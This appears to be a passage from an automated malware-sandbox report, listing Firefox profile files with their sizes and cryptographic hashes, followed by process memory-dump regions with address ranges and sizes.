                                  0a6bd60ddb6c7b699a85a2375706d9fb74ec5ce1024290d2c64814e074041e316f9c3b2b4b9e862d9b5d2879e1e3b4f892dc2e438313b9d24f71e7baf682a453

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\8f860d63-526d-4857-ba55-6808570005f6

                                  Filesize

                                  659B

                                  MD5

                                  52d9d7c2f84996a6701eea97f78c3203

                                  SHA1

                                  d8c8aa6253ae6ea471954266e1cd97e50663ef9c

                                  SHA256

                                  d2744be187dcabd196abe082ac76eba9860ce6e290b0fd2578c03847f56a3035

                                  SHA512

                                  913903739fa35db6b9b3e49f0921549b4b44ee0f0ce92bc339d5e28d96a4d91a132afc50f7bb9f0909c8e6a3cdc9a68bda20cdcf334fafecfd3c9e0c20f1822d

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                  Filesize

                                  1.1MB

                                  MD5

                                  842039753bf41fa5e11b3a1383061a87

                                  SHA1

                                  3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                  SHA256

                                  d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                  SHA512

                                  d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                  Filesize

                                  116B

                                  MD5

                                  2a461e9eb87fd1955cea740a3444ee7a

                                  SHA1

                                  b10755914c713f5a4677494dbe8a686ed458c3c5

                                  SHA256

                                  4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                  SHA512

                                  34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                  Filesize

                                  372B

                                  MD5

                                  bf957ad58b55f64219ab3f793e374316

                                  SHA1

                                  a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                  SHA256

                                  bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                  SHA512

                                  79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                  Filesize

                                  17.8MB

                                  MD5

                                  daf7ef3acccab478aaa7d6dc1c60f865

                                  SHA1

                                  f8246162b97ce4a945feced27b6ea114366ff2ad

                                  SHA256

                                  bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                  SHA512

                                  5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

                                  Filesize

                                  11KB

                                  MD5

                                  465bbf30db2ad07075705f63ff9a3ba5

                                  SHA1

                                  84bb4b8003638a789c8e407ddb7c01f280b4c43c

                                  SHA256

                                  f91e087a73d66b874674b248bcf22076dbecd84273e887ac9986e5aa59316c7b

                                  SHA512

                                  0dab4c0b560a35e81fefa7e89a823c1269b6f260fc53d53c2cce9a4ff2067d78df11dd36fc1d073b7683c6f8648f3522954cc5564aa448cd63ac967016372c20

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

                                  Filesize

                                  10KB

                                  MD5

                                  a42d38da8ba7c3fcc98a958fd9352148

                                  SHA1

                                  a9d785a215120ed13d294d9de048120d2339b4fc

                                  SHA256

                                  296039ffd03de53a819bc50221b30f4c4acab160928665ef183f7d79e99ff016

                                  SHA512

                                  612d12aaeea220a07746d941c0639c3d6f96af597810ccd85dbc383645efcce5773a1c441ac50173240f729df9543b7517ea780f369db1a975dd036fdbe1a1e6

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs.js

                                  Filesize

                                  10KB

                                  MD5

                                  240aa917606e9603d9c56531e5fcc248

                                  SHA1

                                  ec084cda1ef97c713b9895689792170f0e2bc6b5

                                  SHA256

                                  0a0073df79b9f2edf714717e95139fcb3c7018d6fdb4ce284d177d8a2ed1570c

                                  SHA512

                                  642b7a91e05dab7eba7cc24800aa326b601a4a8c501743a0122f2930490ffb5e9f4f1caf9463097a605f5604acf11bd25a603befe3bbb726fff2d7af2078a708

                                • memory/412-157-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/412-190-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/940-1753-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/940-1755-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/1500-548-0x0000000000F30000-0x00000000013BC000-memory.dmp

                                  Filesize

                                  4.5MB

                                • memory/1500-458-0x0000000000F30000-0x00000000013BC000-memory.dmp

                                  Filesize

                                  4.5MB

                                • memory/1500-535-0x0000000000F30000-0x00000000013BC000-memory.dmp

                                  Filesize

                                  4.5MB

                                • memory/1848-32-0x0000000000380000-0x0000000000822000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/1848-18-0x0000000000380000-0x0000000000822000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/1848-16-0x0000000000381000-0x00000000003AF000-memory.dmp

                                  Filesize

                                  184KB

                                • memory/1848-14-0x0000000000380000-0x0000000000822000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/1848-17-0x0000000000380000-0x0000000000822000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/1848-15-0x0000000077814000-0x0000000077816000-memory.dmp

                                  Filesize

                                  8KB

                                • memory/1888-434-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-116-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-477-0x0000000060900000-0x0000000060992000-memory.dmp

                                  Filesize

                                  584KB

                                • memory/1888-1686-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-536-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-1460-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-119-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-1464-0x00000000009E0000-0x0000000000A81000-memory.dmp

                                  Filesize

                                  644KB

                                • memory/1888-476-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-572-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-1592-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-1709-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-549-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1888-1297-0x0000000000400000-0x00000000006DF000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/1912-124-0x0000000000390000-0x0000000000A30000-memory.dmp

                                  Filesize

                                  6.6MB

                                • memory/1912-129-0x0000000000390000-0x0000000000A30000-memory.dmp

                                  Filesize

                                  6.6MB

                                • memory/1988-433-0x0000000000400000-0x00000000004BC000-memory.dmp

                                  Filesize

                                  752KB

                                • memory/2068-353-0x0000000000400000-0x0000000000414000-memory.dmp

                                  Filesize

                                  80KB

                                • memory/2068-72-0x0000000000400000-0x0000000000414000-memory.dmp

                                  Filesize

                                  80KB

                                • memory/2388-569-0x0000000000970000-0x0000000000E6F000-memory.dmp

                                  Filesize

                                  5.0MB

                                • memory/2388-571-0x0000000000970000-0x0000000000E6F000-memory.dmp

                                  Filesize

                                  5.0MB

                                • memory/2564-1242-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-531-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-78-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-53-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-1401-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-565-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-30-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-352-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-1628-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-545-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-1584-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2564-1705-0x0000000000D60000-0x0000000001202000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2904-79-0x0000000000B60000-0x0000000000FEF000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2904-88-0x0000000000B60000-0x0000000000FEF000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2904-36-0x0000000000B60000-0x0000000000FEF000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2904-120-0x0000000000B60000-0x0000000000FEF000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/3548-1296-0x0000000005920000-0x00000000059B2000-memory.dmp

                                  Filesize

                                  584KB

                                • memory/3548-1303-0x0000000005E40000-0x0000000005E58000-memory.dmp

                                  Filesize

                                  96KB

                                • memory/3548-1367-0x0000000009C70000-0x0000000009D13000-memory.dmp

                                  Filesize

                                  652KB

                                • memory/3548-1368-0x0000000009C30000-0x0000000009C3A000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/3548-1369-0x0000000009D20000-0x0000000009D31000-memory.dmp

                                  Filesize

                                  68KB

                                • memory/3548-1370-0x0000000009D40000-0x0000000009D4E000-memory.dmp

                                  Filesize

                                  56KB

                                • memory/3548-1371-0x000000000A010000-0x000000000A024000-memory.dmp

                                  Filesize

                                  80KB

                                • memory/3548-1372-0x000000000A050000-0x000000000A06A000-memory.dmp (Filesize: 104KB)
                                • memory/3548-1373-0x000000000A070000-0x000000000A078000-memory.dmp (Filesize: 32KB)
                                • memory/3548-1374-0x00000000088F0000-0x00000000088FA000-memory.dmp (Filesize: 40KB)
                                • memory/3548-1376-0x000000000A040000-0x000000000A658000-memory.dmp (Filesize: 6.1MB)
                                • memory/3548-1377-0x0000000008D30000-0x0000000008D42000-memory.dmp (Filesize: 72KB)
                                • memory/3548-1378-0x0000000008D90000-0x0000000008DCC000-memory.dmp (Filesize: 240KB)
                                • memory/3548-1379-0x0000000008F00000-0x000000000900A000-memory.dmp (Filesize: 1.0MB)
                                • memory/3548-1380-0x00000000091E0000-0x00000000093A2000-memory.dmp (Filesize: 1.8MB)
                                • memory/3548-1290-0x0000000000D00000-0x0000000001104000-memory.dmp (Filesize: 4.0MB)
                                • memory/3548-1351-0x0000000008810000-0x000000000885C000-memory.dmp (Filesize: 304KB)
                                • memory/3548-1349-0x0000000008570000-0x0000000008592000-memory.dmp (Filesize: 136KB)
                                • memory/3548-1293-0x0000000003170000-0x000000000317E000-memory.dmp (Filesize: 56KB)
                                • memory/3548-1347-0x00000000080C0000-0x0000000008414000-memory.dmp (Filesize: 3.3MB)
                                • memory/3548-1294-0x0000000005580000-0x00000000055DC000-memory.dmp (Filesize: 368KB)
                                • memory/3548-1348-0x00000000084D0000-0x0000000008536000-memory.dmp (Filesize: 408KB)
                                • memory/3548-1295-0x0000000005ED0000-0x0000000006474000-memory.dmp (Filesize: 5.6MB)
                                • memory/3548-1299-0x0000000005850000-0x0000000005862000-memory.dmp (Filesize: 72KB)
                                • memory/3548-1300-0x0000000005E00000-0x0000000005E08000-memory.dmp (Filesize: 32KB)
                                • memory/3548-1339-0x0000000007750000-0x00000000077B6000-memory.dmp (Filesize: 408KB)
                                • memory/3548-1301-0x0000000005E20000-0x0000000005E28000-memory.dmp (Filesize: 32KB)
                                • memory/3548-1302-0x0000000005E30000-0x0000000005E38000-memory.dmp (Filesize: 32KB)
                                • memory/3548-1341-0x00000000077C0000-0x000000000780A000-memory.dmp (Filesize: 296KB)
                                • memory/3548-1340-0x00000000076E0000-0x00000000076FE000-memory.dmp (Filesize: 120KB)
                                • memory/3548-1338-0x00000000076B0000-0x00000000076D2000-memory.dmp (Filesize: 136KB)
                                • memory/3548-1337-0x00000000074A0000-0x0000000007536000-memory.dmp (Filesize: 600KB)
                                • memory/3548-1366-0x0000000009BD0000-0x0000000009BEE000-memory.dmp (Filesize: 120KB)
                                • memory/3548-1320-0x00000000065D0000-0x00000000065E0000-memory.dmp (Filesize: 64KB)
                                • memory/3548-1319-0x0000000006BB0000-0x00000000071D8000-memory.dmp (Filesize: 6.2MB)
                                • memory/3548-1333-0x0000000007220000-0x000000000723A000-memory.dmp (Filesize: 104KB)
                                • memory/3548-1335-0x0000000007280000-0x00000000072B6000-memory.dmp (Filesize: 216KB)
                                • memory/3548-1336-0x0000000007940000-0x0000000007FBA000-memory.dmp (Filesize: 6.5MB)
                                • memory/4524-1579-0x0000000007EA0000-0x0000000007EAA000-memory.dmp (Filesize: 40KB)
                                • memory/4524-1578-0x0000000007EB0000-0x0000000007EC2000-memory.dmp (Filesize: 72KB)
                                • memory/4524-1563-0x000000006EB90000-0x000000006EBDC000-memory.dmp (Filesize: 304KB)
                                • memory/4764-52-0x0000000000B20000-0x0000000000FAB000-memory.dmp (Filesize: 4.5MB)
                                • memory/4764-128-0x0000000000B20000-0x0000000000FAB000-memory.dmp (Filesize: 4.5MB)
                                • memory/4764-125-0x0000000000B20000-0x0000000000FAB000-memory.dmp (Filesize: 4.5MB)
                                • memory/5188-1492-0x0000000007420000-0x0000000007434000-memory.dmp (Filesize: 80KB)
                                • memory/5188-1490-0x00000000073D0000-0x00000000073E1000-memory.dmp (Filesize: 68KB)
                                • memory/5188-1487-0x0000000007090000-0x0000000007133000-memory.dmp (Filesize: 652KB)
                                • memory/5188-1477-0x000000006EB90000-0x000000006EBDC000-memory.dmp (Filesize: 304KB)
                                • memory/5732-1692-0x0000000000400000-0x0000000000C62000-memory.dmp (Filesize: 8.4MB)
                                • memory/5732-1489-0x0000000000400000-0x0000000000C62000-memory.dmp (Filesize: 8.4MB)
                                • memory/5732-1488-0x0000000000400000-0x0000000000C62000-memory.dmp (Filesize: 8.4MB)
                                • memory/5732-1596-0x0000000000400000-0x0000000000C62000-memory.dmp (Filesize: 8.4MB)
                                • memory/5732-1334-0x0000000000400000-0x0000000000C62000-memory.dmp (Filesize: 8.4MB)
                                • memory/6300-1562-0x00000164020A0000-0x00000164020CE000-memory.dmp (Filesize: 184KB)
                                • memory/6456-1428-0x000000006EB90000-0x000000006EBDC000-memory.dmp (Filesize: 304KB)
                                • memory/6456-1438-0x0000000007B40000-0x0000000007BE3000-memory.dmp (Filesize: 652KB)
                                • memory/6456-1427-0x0000000007B00000-0x0000000007B32000-memory.dmp (Filesize: 200KB)
                                • memory/6456-1449-0x0000000007E70000-0x0000000007E81000-memory.dmp (Filesize: 68KB)
                                • memory/6456-1459-0x0000000007EB0000-0x0000000007EC4000-memory.dmp (Filesize: 80KB)
                                • memory/6604-1577-0x0000000000D60000-0x0000000001202000-memory.dmp (Filesize: 4.6MB)
                                • memory/6604-1582-0x0000000000D60000-0x0000000001202000-memory.dmp (Filesize: 4.6MB)
                                • memory/6616-1422-0x0000022283A50000-0x0000022283A7E000-memory.dmp (Filesize: 184KB)
                                • memory/6684-1227-0x00000000008E0000-0x0000000000B88000-memory.dmp (Filesize: 2.7MB)
                                • memory/6684-1226-0x00000000008E0000-0x0000000000B88000-memory.dmp (Filesize: 2.7MB)
                                • memory/6684-1381-0x00000000008E0000-0x0000000000B88000-memory.dmp (Filesize: 2.7MB)
                                • memory/6684-1118-0x00000000008E0000-0x0000000000B88000-memory.dmp (Filesize: 2.7MB)
                                • memory/6684-1407-0x00000000008E0000-0x0000000000B88000-memory.dmp (Filesize: 2.7MB)
